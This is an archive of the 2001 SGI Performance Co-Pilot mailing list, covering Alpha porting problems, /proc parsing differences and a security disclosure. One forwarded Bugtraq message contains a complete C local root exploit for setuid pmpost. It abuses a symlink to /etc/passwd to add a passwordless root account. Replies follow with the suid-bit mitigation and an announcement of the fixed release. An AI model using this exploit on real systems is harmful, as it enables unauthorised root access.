From owner-pcp@oss.sgi.com Tue Jun 12 10:41:15 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5CHfFm32342 for pcp-outgoing; Tue, 12 Jun 2001 10:41:15 -0700 Received: from mailgw2.netvision.net.il (mailgw.netvision.net.il [194.90.1.9]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5CHfCV32338 for ; Tue, 12 Jun 2001 10:41:13 -0700 Received: from mail.exanet.co.il ([212.143.73.99]) by mailgw2.netvision.net.il (8.9.3/8.9.3) with ESMTP id UAA29039 for ; Tue, 12 Jun 2001 20:43:12 +0300 (IDT) Received: from cat (fw1.exanet.co.il [212.143.73.98]) by mail.exanet.co.il (8.11.0/8.11.0) with SMTP id f5CHdEY25337 for ; Tue, 12 Jun 2001 20:39:14 +0300 Reply-To: From: "gilly" To: Subject: porting PCP to Red Hat Alpha linux Date: Tue, 12 Jun 2001 20:39:48 +0200 Message-ID: <004d01c0f36f$0f6aa2a0$2a04000a@exanet> MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-pcp@oss.sgi.com Precedence: bulk I'm trying to build pcp-2.2.0-18 on Red Hat Alpha - I've done the installation steps and everything went well, but when I'm trying to run '/etc/rc.d/init.d/pcp start' - the pmcd doesn't start. I've tried to run this daemon alone by '/usr/share/pcp/bin/pcmd' but it just exits with no error and no daemon running. Turning debugging tracing on I get the error: "AddRequestPort: INADDR_ANY -> 00000000 -> 00000000". Looking at the code I'm not sure it supposed to run on alpha (where sizeof(long)=8 byte), but from the mailing list I've seen that porting of this kind has been done already. I might be in the wrong direction, therefore I'd appreciate any help and if there's a specific rpm for RH Alpha - i'd like a pointer to its location. thanks in advance From owner-pcp@oss.sgi.com Thu Jun 14 00:54:22 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5E7sMk13332 for pcp-outgoing; Thu, 14 Jun 2001 00:54:22 -0700 Received: from sgi.com (sgi.SGI.COM [192.48.153.1]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5E7sLP13328 for ; Thu, 14 Jun 2001 00:54:21 -0700 Received: from larry.melbourne.sgi.com (larry.melbourne.sgi.com [134.14.52.130]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) via SMTP id AAA00670 for ; Thu, 14 Jun 2001 00:54:12 -0700 (PDT) mail_from (markgw@sgi.com) Received: from sherman.melbourne.sgi.com (sherman.melbourne.sgi.com [134.14.55.175]) by larry.melbourne.sgi.com (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id RAA12607; Thu, 14 Jun 2001 17:52:48 +1000 Date: Thu, 14 Jun 2001 17:52:48 +1000 (EST) From: Mark Goodwin X-Sender: markgw@sherman.melbourne.sgi.com To: gilly cc: pcp@oss.sgi.com Subject: Re: porting PCP to Red Hat Alpha linux In-Reply-To: <004d01c0f36f$0f6aa2a0$2a04000a@exanet> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-pcp@oss.sgi.com Precedence: bulk On Tue, 12 Jun 2001, gilly wrote: > I'm trying to build pcp-2.2.0-18 on Red Hat Alpha - I've done the > installation steps and everything went well, but when I'm trying to run > '/etc/rc.d/init.d/pcp start' - the pmcd doesn't start. I've tried to run > this daemon alone by '/usr/share/pcp/bin/pcmd' but it just exits with no > error and no daemon running. Turning debugging tracing on I get the error: > "AddRequestPort: INADDR_ANY -> 00000000 -> 00000000". > Looking at the code I'm not sure it supposed to run on alpha (where > sizeof(long)=8 byte), but from the mailing list I've seen that porting of > this kind has been done already. > I might be in the wrong direction, therefore I'd appreciate any help and if > there's a specific rpm for RH Alpha - i'd like a pointer to its location. > thanks in advance > > PCP has built and run successfully on linux-alpha before, but not the latest version (2.2.0-18). I don't happen to have an alpha machine handy to test it on ;-) Were there any strange compilation warnings? Is there already something listening on tcp port 4321? Please send me /var/log/pcp/pmcd/pmcd.log It might also help if you send me the output of: strace /usr/share/pcp/bin/pmcd -f and ltrace /usr/share/pcp/bin/pmcd -f thanks -- Mark From owner-pcp@oss.sgi.com Thu Jun 14 01:22:18 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5E8MIE16676 for pcp-outgoing; Thu, 14 Jun 2001 01:22:18 -0700 Received: from mailgw3.netvision.net.il (mailgw.netvision.net.il [194.90.1.11]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5E8MFP16665 for ; Thu, 14 Jun 2001 01:22:16 -0700 Received: from mail.exanet.co.il ([212.143.73.99]) by mailgw3.netvision.net.il (8.9.3/8.9.3) with ESMTP id LAA21442 for ; Thu, 14 Jun 2001 11:20:30 +0300 (IDT) Received: from cat (fw1.exanet.co.il [212.143.73.98]) by mail.exanet.co.il (8.11.0/8.11.0) with SMTP id f5E8Lvg12218 for ; Thu, 14 Jun 2001 11:21:57 +0300 Reply-To: From: "gilly" To: Subject: RE: porting PCP to Red Hat Alpha linux Date: Thu, 14 Jun 2001 11:20:50 +0200 Message-ID: <007d01c0f4b3$4e7f68f0$2a04000a@exanet> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal In-reply-to: Sender: owner-pcp@oss.sgi.com Precedence: bulk thanks - meantime I've found the problem and it doesn't concern the Alpha machine: I'm working on Linux 2.4 (Red Hat 7.0) and I understand the sources are Linux 2.2.16 compatible, therefore the format of the /proc files is different. Changing the parsing of theses files in the linux PMDA solves the problems I've encountered first. However this brings a new question - do you have a package that supports Linux 2.4, and more generally - do you intend to keep trace with new linux versions, or no new development is done? thanks in advance gilly -----Original Message----- From: owner-pcp@oss.sgi.com [mailto:owner-pcp@oss.sgi.com]On Behalf Of Mark Goodwin Sent: Thursday, June 14, 2001 9:53 AM To: gilly Cc: pcp@oss.sgi.com Subject: Re: porting PCP to Red Hat Alpha linux On Tue, 12 Jun 2001, gilly wrote: > I'm trying to build pcp-2.2.0-18 on Red Hat Alpha - I've done the > installation steps and everything went well, but when I'm trying to run > '/etc/rc.d/init.d/pcp start' - the pmcd doesn't start. I've tried to run > this daemon alone by '/usr/share/pcp/bin/pcmd' but it just exits with no > error and no daemon running. Turning debugging tracing on I get the error: > "AddRequestPort: INADDR_ANY -> 00000000 -> 00000000". > Looking at the code I'm not sure it supposed to run on alpha (where > sizeof(long)=8 byte), but from the mailing list I've seen that porting of > this kind has been done already. > I might be in the wrong direction, therefore I'd appreciate any help and if > there's a specific rpm for RH Alpha - i'd like a pointer to its location. > thanks in advance > > PCP has built and run successfully on linux-alpha before, but not the latest version (2.2.0-18). I don't happen to have an alpha machine handy to test it on ;-) Were there any strange compilation warnings? Is there already something listening on tcp port 4321? Please send me /var/log/pcp/pmcd/pmcd.log It might also help if you send me the output of: strace /usr/share/pcp/bin/pmcd -f and ltrace /usr/share/pcp/bin/pmcd -f thanks -- Mark From owner-pcp@oss.sgi.com Thu Jun 14 17:51:53 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5F0prc12507 for pcp-outgoing; Thu, 14 Jun 2001 17:51:53 -0700 Received: from yog-sothoth.sgi.com (eugate.sgi.com [192.48.160.10]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5F0pqk12501 for ; Thu, 14 Jun 2001 17:51:52 -0700 Received: from larry.melbourne.sgi.com (larry.melbourne.sgi.com [134.14.52.130]) by yog-sothoth.sgi.com (980305.SGI.8.8.8-aspam-6.2/980304.SGI-aspam-europe) via SMTP id CAA246491 for ; Fri, 15 Jun 2001 02:51:48 +0200 (CEST) mail_from (markgw@sgi.com) Received: from sherman.melbourne.sgi.com (sherman.melbourne.sgi.com [134.14.55.175]) by larry.melbourne.sgi.com (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id KAA17628; Fri, 15 Jun 2001 10:50:28 +1000 Date: Fri, 15 Jun 2001 10:50:28 +1000 (EST) From: Mark Goodwin X-Sender: markgw@sherman.melbourne.sgi.com To: gilly cc: pcp@oss.sgi.com Subject: RE: porting PCP to Red Hat Alpha linux In-Reply-To: <007d01c0f4b3$4e7f68f0$2a04000a@exanet> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-pcp@oss.sgi.com Precedence: bulk On Thu, 14 Jun 2001, gilly wrote: > thanks - meantime I've found the problem and it doesn't concern the Alpha > machine: > I'm working on Linux 2.4 (Red Hat 7.0) and I understand the sources are > Linux 2.2.16 compatible, therefore the format of the /proc files is > different. Changing the parsing of theses files in the linux PMDA solves the > problems I've encountered first. pcp-2.2.0-18 works fine on rh7.1-i386 with 2.4.x kernel. Which /proc entry caused problems on linux-alpha and/or please send the patch? > However this brings a new question - do you > have a package that supports Linux 2.4, and more generally - do you intend > to keep trace with new linux versions, or no new development is done? >From SGI: no new features released to open source. However, we will be maintaining the PCP open source release, tracking new linux releases and continuing the gatekeeper role of accepting new features/patches from the community. If you have new features that use PCP, such as gui monitoring tools, new PCP PMDAs (agents) or whatever, we'd be more than delighted to include them in the open source release! thanks -- Mark Goodwin SGI Engineering From owner-pcp@oss.sgi.com Sun Jun 17 02:46:46 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5H9kkm27559 for pcp-outgoing; Sun, 17 Jun 2001 02:46:46 -0700 Received: from mailgw1.netvision.net.il (mailgw.netvision.net.il [194.90.1.14]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5H9khZ27547 for ; Sun, 17 Jun 2001 02:46:44 -0700 Received: from mail.exanet.co.il ([212.143.73.99]) by mailgw1.netvision.net.il (8.9.3/8.9.3) with ESMTP id MAA01721 for ; Sun, 17 Jun 2001 12:46:40 +0300 (IDT) Received: from cat (fw1.exanet.co.il [212.143.73.98]) by mail.exanet.co.il (8.11.0/8.11.0) with SMTP id f5H9kDl17720 for ; Sun, 17 Jun 2001 12:46:17 +0300 Reply-To: From: "gilly" To: Subject: RE: porting PCP to Red Hat Alpha linux Date: Sun, 17 Jun 2001 12:45:47 +0200 Message-ID: <001001c0f71a$ab6f1c90$2a04000a@exanet> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0011_01C0F72B.6EF7EC90" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) In-Reply-To: X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-pcp@oss.sgi.com Precedence: bulk This is a multi-part message in MIME format. ------=_NextPart_000_0011_01C0F72B.6EF7EC90 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit The differences in /proc files (attached are example files generated in my alpha): 1. /proc/cpuinfo. In proc_cpuinfo.c (part of the linux PMDA) 'refresh_proc_cpuinfo' updates 'cpunum' according to the first line in /proc/cpuinfo which is supposed to include the word 'processor'. This line doesn't appear in the file on my machine - therefore the program exits. Besides, the rest of the file uses different titles so the values can't be parsed correctly. 2. /proc/net/rpc/nfsd. In 'proc_net_rpc.c' 'refresh_proc_net_rpc expects a line with title 'rc' and 9 parameters. In the file on my machine these parameters are split into two lines with titles: 'rc' & 'fh', and the 'fh' file includes 5 parameters nly - 'fh_concurrent' does not appear. (three extra lines appear in this file; the titles are: 'io', 'th', 'ra'). -----Original Message----- From: Mark Goodwin [mailto:markgw@sgi.com] Sent: Friday, June 15, 2001 2:50 AM To: gilly Cc: pcp@oss.sgi.com Subject: RE: porting PCP to Red Hat Alpha linux On Thu, 14 Jun 2001, gilly wrote: > thanks - meantime I've found the problem and it doesn't concern the Alpha > machine: > I'm working on Linux 2.4 (Red Hat 7.0) and I understand the sources are > Linux 2.2.16 compatible, therefore the format of the /proc files is > different. Changing the parsing of these files in the linux PMDA solves the > problems I've encountered first. pcp-2.2.0-18 works fine on rh7.1-i386 with 2.4.x kernel. Which /proc entry caused problems on linux-alpha and/or please send the patch? > However this brings a new question - do you > have a package that supports Linux 2.4, and more generally - do you intend > to keep trace with new linux versions, or no new development is done? >From SGI: no new features released to open source. However, we will be maintaining the PCP open source release, tracking new linux releases and continuing the gatekeeper role of accepting new features/patches from the community. If you have new features that use PCP, such as gui monitoring tools, new PCP PMDAs (agents) or whatever, we'd be more than delighted to include them in the open source release! thanks -- Mark Goodwin SGI Engineering ------=_NextPart_000_0011_01C0F72B.6EF7EC90 Content-Type: text/plain; name="proc_cpuinfo.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="proc_cpuinfo.txt" cpu : Alpha =0A= cpu model : EV56 =0A= cpu variation : 7=0A= cpu revision : 0=0A= cpu serial number : =0A= system type : Miata =0A= system variation : 0 =0A= system revision : 0=0A= system serial number :=20 =0A= cycle frequency [Hz] : 499863040 est. =0A= timer frequency [Hz] : 1024.00=0A= page size [bytes] : 8192 =0A= phys. address bits : 40=0A= max. addr. space # : 127=0A= BogoMIPS : 988.76=0A= kernel unaligned acc : 0 (pc=3D0,va=3D0) =0A= user unaligned acc : 35 (pc=3D1200027e8,va=3D20000284712) =0A= platform string : Digital Personal WorkStation 500 au=0A= cpus detected : 1=0A= cpus active : 1=0A= cpu active mask : 0000000000000001=0A= ------=_NextPart_000_0011_01C0F72B.6EF7EC90 Content-Type: text/plain; name="proc_net_rpc_nfsd.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="proc_net_rpc_nfsd.txt" rc 0 1106 3833 =0A= fh 0 4768 0 0 0=0A= io 13802505 3472181 =0A= th 8 0 2.295 0.039 0.003 0.000 0.000 0.000 0.000 0.000 0.000 0.000 =0A= ra 16 1660 13 0 1 1 3 1 0 1 0 169=0A= net 4939 4939 0 0=0A= rpc 4939 0 0 0 0=0A= proc2 18 31 130 43 0 1806 0 1849 0 722 127 88 0 2 2 16 1 105 17=0A= proc3 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0=0A= ------=_NextPart_000_0011_01C0F72B.6EF7EC90-- From owner-pcp@oss.sgi.com Sun Jun 17 17:56:50 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5I0uon01959 for pcp-outgoing; Sun, 17 Jun 2001 17:56:50 -0700 Received: from deliverator.sgi.com ([204.94.214.10]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5I0uoO01955 for ; Sun, 17 Jun 2001 17:56:50 -0700 Received: from larry.melbourne.sgi.com (larry.melbourne.sgi.com [134.14.52.130]) by deliverator.sgi.com (980309.SGI.8.8.8-aspam-6.2/980310.SGI-aspam) via SMTP id RAA08794 for ; Sun, 17 Jun 2001 17:55:52 -0700 (PDT) mail_from (markgw@sgi.com) Received: from sherman.melbourne.sgi.com (sherman.melbourne.sgi.com [134.14.55.175]) by larry.melbourne.sgi.com (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id KAA04216; Mon, 18 Jun 2001 10:54:36 +1000 Date: Mon, 18 Jun 2001 10:54:36 +1000 (EST) From: Mark Goodwin X-Sender: markgw@sherman.melbourne.sgi.com To: gilly cc: pcp@oss.sgi.com Subject: RE: porting PCP to Red Hat Alpha linux In-Reply-To: <001001c0f71a$ab6f1c90$2a04000a@exanet> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-pcp@oss.sgi.com Precedence: bulk On Sun, 17 Jun 2001, gilly wrote: > The differences in /proc files (attached are example files generated in my > alpha): > 1. /proc/cpuinfo. > 2. /proc/net/rpc/nfsd. > OK, these are alpha specific differences. Since you already have it going on rh-alpha, please send me a patch. I'll merge it with the existing code so as to handle both formats. thanks -- Mark From owner-pcp@oss.sgi.com Mon Jun 18 07:43:01 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5IEh1V10946 for pcp-outgoing; Mon, 18 Jun 2001 07:43:01 -0700 Received: from mailgw1.netvision.net.il (mailgw1.netvision.net.il [194.90.1.14]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5IEgwV10943 for ; Mon, 18 Jun 2001 07:42:59 -0700 Received: from mail.exanet.co.il ([212.143.73.99]) by mailgw1.netvision.net.il (8.9.3/8.9.3) with ESMTP id RAA21192 for ; Mon, 18 Jun 2001 17:42:56 +0300 (IDT) Received: from cat (fw1.exanet.co.il [212.143.73.98]) by mail.exanet.co.il (8.11.0/8.11.0) with SMTP id f5IEgMl29169 for ; Mon, 18 Jun 2001 17:42:23 +0300 Reply-To: From: "gilly" To: Subject: RE: porting PCP to Red Hat Alpha linux Date: Mon, 18 Jun 2001 17:26:49 +0200 Message-ID: <004b01c0f80d$397a3ef0$2a04000a@exanet> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) In-Reply-To: X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-pcp@oss.sgi.com Precedence: bulk There's a problem creating a matching patch to do exactly what the code is doing now. In the alpha format of /proc/cpuinfo there are no details per processor as in the intel one (since all processors have the same capabilities), therefore I can fill only ONE 'info' struct and get the number of active & detected processors. -----Original Message----- From: Mark Goodwin [mailto:markgw@sgi.com] Sent: Monday, June 18, 2001 2:55 AM To: gilly Cc: pcp@oss.sgi.com Subject: RE: porting PCP to Red Hat Alpha linux On Sun, 17 Jun 2001, gilly wrote: > The differences in /proc files (attached are example files generated in my > alpha): > 1. /proc/cpuinfo. > 2. /proc/net/rpc/nfsd. > OK, these are alpha specific differences. Since you already have it going on rh-alpha, please send me a patch. I'll merge it with the existing code so as to handle both formats. thanks -- Mark From owner-pcp@oss.sgi.com Mon Jun 18 23:17:07 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5J6H7811084 for pcp-outgoing; Mon, 18 Jun 2001 23:17:07 -0700 Received: from arthur.plbohnice.cz ([194.108.220.193]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5J6H4V11080 for ; Mon, 18 Jun 2001 23:17:05 -0700 Received: (from lemming@localhost) by arthur.plbohnice.cz (8.9.3/8.10.1) id IAA15468 for pcp@oss.sgi.com; Tue, 19 Jun 2001 08:17:03 +0200 Date: Tue, 19 Jun 2001 08:17:03 +0200 From: Michal Kara To: pcp@oss.sgi.com Subject: PCP exploit: pmpost - another nice symlink follower Message-ID: <20010619081703.A15425@arthur.plbohnice.cz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-pcp@oss.sgi.com Precedence: bulk I guess this is of a high importance for people on this list... If you don't need pmpost suided, just remove the suid bit and it'll be fine. Michal ----- Forwarded message from Paul Starzetz ----- Return-Path: Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Date: Mon, 18 Jun 2001 19:11:20 +0200 From: Paul Starzetz X-Accept-Language: en To: "bugtraq@securityfocus.com" Subject: pmpost - another nice symlink follower Hi, there is a symlink handling problem in the pcp suite from SGI. The binary pmpost will follow symlinks, if setuid root this leads to instant root compromise, as found on SuSE 7.1 (I doubt that this a default SuSE package, though). Attached a simple C source to demonstrate this (gcc pm.c -o pm then ./pm) Ihq. ---------------------- pm.c ---------------------------- /******************************************************** * * * pmpost local root exploit * * vulnerable: pcp <= 2.1.11-5 * * by IhaQueR * * * ********************************************************/ #include #include #include #include #include main() { const char *bin="/usr/share/pcp/bin/pmpost"; static char buf[512]; static char dir[128]; srand(time(NULL)); sprintf(dir, "/tmp/dupa.%.8d", rand()); if(mkdir(dir, S_IRWXU)) _exit(2); if(chdir(dir)) _exit(3); if(symlink("/etc/passwd", "./NOTICES")) _exit(4); snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir); if(putenv(buf)) _exit(5); if(!fork()) { execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL); _exit(1); } else { waitpid(0, NULL, WUNTRACED); chdir(".."); sprintf(buf, "rm -rf dupa.*"); system(buf); execl("/bin/su", "/bin/su", "r00t", NULL); } } ----- End forwarded message ----- From owner-pcp@oss.sgi.com Tue Jun 19 00:01:16 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5J71GA11737 for pcp-outgoing; Tue, 19 Jun 2001 00:01:16 -0700 Received: from ii.uib.no (eik-192.ii.uib.no [129.177.192.29]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5J71EV11729 for ; Tue, 19 Jun 2001 00:01:14 -0700 Received: from apal-192.ii.uib.no (apal.ii.uib.no) [129.177.192.27] by ii.uib.no with esmtp (Exim 3.03) id 15CFVg-0004PU-00 for ; Tue, 19 Jun 2001 09:01:12 +0200 Received: (from janfrode@localhost) by apal.ii.uib.no (8.9.3+Sun/8.9.3) id JAA19635 for pcp@oss.sgi.com; Tue, 19 Jun 2001 09:01:11 +0200 (MEST) Date: Tue, 19 Jun 2001 09:01:11 +0200 From: Jan-Frode Myklebust To: pcp@oss.sgi.com Subject: Re: PCP exploit: pmpost - another nice symlink follower Message-ID: <20010619090111.A19149@ii.uib.no> Mail-Followup-To: pcp@oss.sgi.com References: <20010619081703.A15425@arthur.plbohnice.cz> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20010619081703.A15425@arthur.plbohnice.cz>; from lemming@arthur.plbohnice.cz on Tue, Jun 19, 2001 at 08:17:03AM +0200 Sender: owner-pcp@oss.sgi.com Precedence: bulk On Tue, Jun 19, 2001 at 08:17:03AM +0200, Michal Kara wrote: > I guess this is of a high importance for people on this list... If you don't > need pmpost suided, just remove the suid bit and it'll be fine. > I just verified this on IRIX (not the opensource pcp), which also is vulnerable. Could somebody at sgi tell us the consequence of removing the suid bit here? -jf From owner-pcp@oss.sgi.com Tue Jun 19 00:32:48 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5J7WmK12250 for pcp-outgoing; Tue, 19 Jun 2001 00:32:48 -0700 Received: from pneumatic-tube.sgi.com ([204.94.214.22]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5J7WlV12247 for ; Tue, 19 Jun 2001 00:32:47 -0700 Received: from larry.melbourne.sgi.com (larry.melbourne.sgi.com [134.14.52.130]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via SMTP id AAA01780 for ; Tue, 19 Jun 2001 00:32:17 -0700 (PDT) mail_from (markgw@sgi.com) Received: from sherman.melbourne.sgi.com (sherman.melbourne.sgi.com [134.14.55.175]) by larry.melbourne.sgi.com (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id RAA13988; Tue, 19 Jun 2001 17:30:18 +1000 Date: Tue, 19 Jun 2001 17:30:18 +1000 (EST) From: Mark Goodwin X-Sender: markgw@sherman.melbourne.sgi.com To: Jan-Frode Myklebust cc: pcp@oss.sgi.com Subject: Re: PCP exploit: pmpost - another nice symlink follower In-Reply-To: <20010619090111.A19149@ii.uib.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-pcp@oss.sgi.com Precedence: bulk On Tue, 19 Jun 2001, Jan-Frode Myklebust wrote: > On Tue, Jun 19, 2001 at 08:17:03AM +0200, Michal Kara wrote: > > I guess this is of a high importance for people on this list... If you don't > > need pmpost suided, just remove the suid bit and it'll be fine. > > > > I just verified this on IRIX (not the opensource > pcp), which also is vulnerable. Could somebody at > sgi tell us the consequence of removing the suid > bit here? > As Michal said, the fix is to remove the suid bit. The only consequence is that the PCP "NOTICES" file (/var/log/pcp/NOTICES on linux, and /var/adm/pcplog/NOTICES on IRIX) will not be created if it doesn't exist. This should only affect a new installation, so you would have to create this file by hand. We'll have a new PCP RPM as soon as we can. For IRIX, a patch may be necessary. -- Mark Goodwin SGI Engineering From owner-pcp@oss.sgi.com Wed Jun 20 22:22:51 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5L5Mpp27904 for pcp-outgoing; Wed, 20 Jun 2001 22:22:51 -0700 Received: from sgi.com (sgi.SGI.COM [192.48.153.1]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5L5MoV27901 for ; Wed, 20 Jun 2001 22:22:50 -0700 Received: from larry.melbourne.sgi.com (larry.melbourne.sgi.com [134.14.52.130]) by sgi.com (980327.SGI.8.8.8-aspam/980304.SGI-aspam: SGI does not authorize the use of its proprietary systems or networks for unsolicited or bulk email from the Internet.) via SMTP id WAA02003 for ; Wed, 20 Jun 2001 22:22:42 -0700 (PDT) mail_from (markgw@sgi.com) Received: from sherman.melbourne.sgi.com (sherman.melbourne.sgi.com [134.14.55.175]) by larry.melbourne.sgi.com (950413.SGI.8.6.12/950213.SGI.AUTOCF) via ESMTP id PAA29739; Thu, 21 Jun 2001 15:21:16 +1000 Date: Thu, 21 Jun 2001 15:21:16 +1000 (EST) From: Mark Goodwin X-Sender: markgw@sherman.melbourne.sgi.com To: pcp@oss.sgi.com, linuxperf@nl.linux.org, linux-announce@sws1.ctd.ornl.gov, Beowulf@beowulf.org.com, bugtraq@securityfocus.com cc: paul@starzetz.de Subject: [ANNOUNCE] SGI Performance Co-Pilot 2.2.1-3 now available Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-pcp@oss.sgi.com Precedence: bulk Performance Co-Pilot (version 2.2.1-3) is now available. This version contains fixes for the recent security issues uncovered against the earlier 2.2.0-18 release. Please upgrade; the new source and binary RPMs are available from http://oss.sgi.com/projects/pcp/download For PCP on IRIX, a patch will be available shortly for SGI customers. If anyone finds any further PCP security issues, please mail me (markgw@sgi.com) directly before wider distribution. thanks -- Mark Goodwin SGI Engineering From owner-pcp@oss.sgi.com Thu Jun 21 01:21:51 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5L8LpU31410 for pcp-outgoing; Thu, 21 Jun 2001 01:21:51 -0700 Received: from mailgw1.netvision.net.il (mailgw1.netvision.net.il [194.90.1.14]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5L8LZV31393 for ; Thu, 21 Jun 2001 01:21:41 -0700 Received: from mail.exanet.co.il ([212.143.73.99]) by mailgw1.netvision.net.il (8.9.3/8.9.3) with ESMTP id LAA03211 for ; Thu, 21 Jun 2001 11:21:31 +0300 (IDT) Received: from cat (fw1.exanet.co.il [212.143.73.98]) by mail.exanet.co.il (8.11.0/8.11.0) with SMTP id f5L8KYl22024 for ; Thu, 21 Jun 2001 11:20:34 +0300 Reply-To: From: "gilly" To: Subject: user friendly PMAPI Date: Thu, 21 Jun 2001 11:20:34 +0200 Message-ID: <000401c0fa33$6d9c2680$2a04000a@exanet> MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-pcp@oss.sgi.com Precedence: bulk hello again. The man page of pmFetch says - "Note that pmFetch is the most primitive method of fetchingmetric values from the PMCS. More user friendly interfaces to the PMCS are available or currently under development..." Are there any 'more friendly interfaces available NOW in the open source package? if so, can you please tell me where? thanks, gilly. From owner-pcp@oss.sgi.com Thu Jun 21 01:21:52 2001 Received: (from majordomo@localhost) by oss.sgi.com (8.11.2/8.11.3) id f5L8Lqp31417 for pcp-outgoing; Thu, 21 Jun 2001 01:21:52 -0700 Received: from mailgw1.netvision.net.il (mailgw.netvision.net.il [194.90.1.14]) by oss.sgi.com (8.11.2/8.11.3) with SMTP id f5L8LmV31405 for ; Thu, 21 Jun 2001 01:21:48 -0700 Received: from mail.exanet.co.il ([212.143.73.99]) by mailgw1.netvision.net.il (8.9.3/8.9.3) with ESMTP id LAA03116 for ; Thu, 21 Jun 2001 11:21:23 +0300 (IDT) Received: from cat (fw1.exanet.co.il [212.143.73.98]) by mail.exanet.co.il (8.11.0/8.11.0) with SMTP id f5L8KQl22019 for ; Thu, 21 Jun 2001 11:20:26 +0300 Reply-To: From: "gilly" To: Subject: RE: porting PCP to Red Hat Alpha linux Date: Thu, 21 Jun 2001 11:20:25 +0200 Message-ID: <000001c0fa33$68a36a30$2a04000a@exanet> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0001_01C0FA44.2C2C3A30" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-pcp@oss.sgi.com Precedence: bulk This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C0FA44.2C2C3A30 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit attached is the patch to fix the 'cpuinfo' problems in the alpha machine. -----Original Message----- From: Mark Goodwin 